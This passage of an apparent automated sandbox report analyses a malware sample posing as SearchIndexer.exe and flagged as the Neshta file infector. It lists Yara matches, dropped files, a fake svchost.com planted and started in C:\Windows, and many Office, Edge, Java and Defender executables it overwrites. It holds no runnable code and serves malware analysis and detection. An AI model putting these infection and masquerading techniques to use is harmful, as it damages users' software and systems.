Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Code function: 53_2_00007FFD9B894BB0 push ebp; retf	53_2_00007FFD9B894BBC
Source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe	Code function: 53_2_00007FFD9B89611B pushad ; ret	53_2_00007FFD9B89612D
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 56_2_00007FFD9B8753E3 push ds; ret	56_2_00007FFD9B8753F3
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 56_2_00007FFD9B874BB0 push ebp; retf	56_2_00007FFD9B874BBC
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 56_2_00007FFD9B87611B pushad ; ret	56_2_00007FFD9B87612D
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Code function: 56_2_00007FFD9B8700BD pushad ; iretd	56_2_00007FFD9B8700C1
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Code function: 59_2_00007FFD9B8953E3 push ds; ret	59_2_00007FFD9B8953F3
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Code function: 59_2_00007FFD9B894BB0 push ebp; retf	59_2_00007FFD9B894BBC
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Code function: 59_2_00007FFD9B89611B pushad ; ret	59_2_00007FFD9B89612D

Persistence and Installation Behavior

Yara detected Neshta

Source: Yara match	File source: SearchIndexer.exe, type: SAMPLE
Source: Yara match	File source: 0.0.SearchIndexer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000034.00000002.2186722542.0000000000409000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2762934153.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SearchIndexer.exe PID: 6636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.com PID: 9192, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\svchost.com, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\SearchIndexer.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe, type: DROPPED

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\SearchIndexer.exe

File created: C:\Windows\svchost.com

Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\SearchIndexer.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown	Executable created and started: C:\Windows\svchost.com
Source: C:\Windows\svchost.com	Executable created and started: C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe	Jump to behavior
